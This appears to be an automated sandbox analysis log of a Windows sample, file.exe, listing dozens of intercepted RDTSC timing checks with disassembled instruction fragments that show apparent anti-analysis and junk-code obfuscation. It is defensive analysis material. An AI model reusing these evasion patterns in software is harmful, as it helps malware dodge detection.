                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1011D9C second address: 1011DE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp], esi 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F8408CC9F88h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 pushad 0x00000025 mov eax, dword ptr [ebp+122D29F7h] 0x0000002b sub dword ptr [ebp+1245003Ah], esi 0x00000031 popad 0x00000032 push eax 0x00000033 jg 00007F8408CC9F94h 0x00000039 push eax 0x0000003a push edx 0x0000003b jnp 00007F8408CC9F86h 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1011E51 second address: 1011E57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1012633 second address: 1012639 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1012639 second address: 101266E instructions: 0x00000000 rdtsc 0x00000002 jp 00007F84086DC788h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jg 00007F84086DC792h 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 jmp 00007F84086DC78Bh 0x0000001a mov eax, dword ptr [eax] 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101266E second address: 101267B instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8408CC9F86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1012720 second address: 1012727 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1012727 second address: 1012748 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a stc 0x0000000b lea eax, dword ptr [ebp+124833B3h] 0x00000011 mov dword ptr [ebp+122D1A4Fh], ecx 0x00000017 nop 0x00000018 pushad 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c pop edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1012748 second address: 101274C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101274C second address: 10127C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push esi 0x0000000a jmp 00007F8408CC9F91h 0x0000000f pop esi 0x00000010 pop eax 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007F8408CC9F88h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 00000018h 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c mov ch, 0Dh 0x0000002e mov edi, ebx 0x00000030 lea eax, dword ptr [ebp+1248336Fh] 0x00000036 push 00000000h 0x00000038 push eax 0x00000039 call 00007F8408CC9F88h 0x0000003e pop eax 0x0000003f mov dword ptr [esp+04h], eax 0x00000043 add dword ptr [esp+04h], 0000001Bh 0x0000004b inc eax 0x0000004c push eax 0x0000004d ret 0x0000004e pop eax 0x0000004f ret 0x00000050 mov dword ptr [ebp+122D1D65h], edx 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 push ecx 0x0000005a push ecx 0x0000005b pop ecx 0x0000005c pop ecx 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10127C4 second address: 10127CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103F1DF second address: 103F21A instructions: 0x00000000 rdtsc 0x00000002 je 00007F8408CC9F86h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jo 00007F8408CC9FACh 0x00000012 jmp 00007F8408CC9F91h 0x00000017 jmp 00007F8408CC9F95h 0x0000001c push edi 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103F37F second address: 103F389 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F84086DC786h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103F389 second address: 103F3A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8408CC9F90h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103F3A3 second address: 103F3A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103F3A9 second address: 103F3BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8408CC9F8Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1042E95 second address: 1042EA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop esi 0x00000008 push eax 0x00000009 jnp 00007F84086DC78Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1049F16 second address: 1049F27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jnc 00007F8408CC9F86h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1048B46 second address: 1048B5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84086DC78Fh 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1048B5E second address: 1048B62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1048E4E second address: 1048E73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 jo 00007F84086DC786h 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F84086DC792h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10491A7 second address: 10491AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10491AD second address: 10491B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10491B1 second address: 10491B8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1049367 second address: 104936D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1048842 second address: 1048846 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1048846 second address: 1048856 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007F84086DC786h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1048856 second address: 104886F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8408CC9F93h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104886F second address: 10488A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84086DC791h 0x00000007 pushad 0x00000008 jmp 00007F84086DC78Dh 0x0000000d jmp 00007F84086DC790h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1049790 second address: 10497BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F8408CC9F9Dh 0x0000000c jg 00007F8408CC9F8Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10497BB second address: 10497C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10497C3 second address: 10497C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10497C7 second address: 10497E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F84086DC78Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10497E1 second address: 10497E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104E3FC second address: 104E400 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104E545 second address: 104E55E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F8408CC9F90h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104E6D8 second address: 104E6FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F84086DC791h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnc 00007F84086DC788h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104E6FB second address: 104E70E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8408CC9F8Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104E893 second address: 104E897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104E897 second address: 104E89B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104E89B second address: 104E8E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84086DC797h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F84086DC794h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F84086DC795h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104E8E5 second address: 104E8E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104EE89 second address: 104EEA2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F84086DC78Ch 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104EEA2 second address: 104EEBB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8408CC9F93h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104EEBB second address: 104EEC2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104F2DC second address: 104F2EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F8408CC9F8Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104F2EA second address: 104F2F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104E0F7 second address: 104E107 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jne 00007F8408CC9F86h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104E107 second address: 104E10B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1052CF1 second address: 1052CF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105286B second address: 105286F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1054F7E second address: 1054FC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8408CC9F99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F8408CC9F8Ch 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 jmp 00007F8408CC9F97h 0x00000017 pop edi 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1054FC3 second address: 1054FE8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jp 00007F84086DC786h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F84086DC797h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1054FE8 second address: 1054FEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1058310 second address: 1058332 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F84086DC786h 0x00000009 push eax 0x0000000a pop eax 0x0000000b jmp 00007F84086DC795h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1058332 second address: 1058354 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F8408CC9F99h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105E353 second address: 105E357 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105E4B8 second address: 105E4BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105E60B second address: 105E61C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push ecx 0x00000008 pushad 0x00000009 popad 0x0000000a jp 00007F84086DC786h 0x00000010 pop ecx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105E61C second address: 105E622 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105E622 second address: 105E62C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F84086DC786h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105E62C second address: 105E644 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8408CC9F86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jp 00007F8408CC9F86h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1064942 second address: 1064946 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1064946 second address: 1064971 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F8408CC9F94h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F8408CC9F8Bh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10631FB second address: 106320C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 jmp 00007F84086DC78Ah 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106320C second address: 106323A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8408CC9F8Ah 0x00000008 pushad 0x00000009 jmp 00007F8408CC9F8Fh 0x0000000e jmp 00007F8408CC9F90h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1063810 second address: 1063815 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10639BA second address: 10639C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10639C1 second address: 10639C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10639C7 second address: 10639CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1012222 second address: 1012261 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F84086DC786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F84086DC78Bh 0x0000000f popad 0x00000010 push eax 0x00000011 jmp 00007F84086DC78Ah 0x00000016 nop 0x00000017 mov dx, 2362h 0x0000001b push 00000004h 0x0000001d jmp 00007F84086DC791h 0x00000022 push eax 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1012261 second address: 1012265 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1012265 second address: 101226F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101226F second address: 1012273 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1067824 second address: 1067835 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push esi 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1067835 second address: 1067839 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1066F3B second address: 1066F65 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F84086DC788h 0x00000008 jno 00007F84086DC78Eh 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F84086DC78Bh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1066F65 second address: 1066F69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1067221 second address: 1067253 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84086DC791h 0x00000009 popad 0x0000000a jmp 00007F84086DC791h 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jno 00007F84086DC786h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1067253 second address: 1067257 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1067257 second address: 106725D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106725D second address: 1067263 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106F8E1 second address: 106F8EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F84086DC786h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106F8EB second address: 106F8F1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106F8F1 second address: 106F8F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106F8F7 second address: 106F923 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8408CC9F92h 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007F8408CC9F93h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106D991 second address: 106D9AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jmp 00007F84086DC795h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106DADB second address: 106DAF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F8408CC9F91h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106DAF9 second address: 106DB12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84086DC793h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106DB12 second address: 106DB1C instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8408CC9F8Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106DC67 second address: 106DC6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106E54A second address: 106E54E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106E54E second address: 106E56F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F84086DC786h 0x0000000a jmp 00007F84086DC797h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106E841 second address: 106E847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
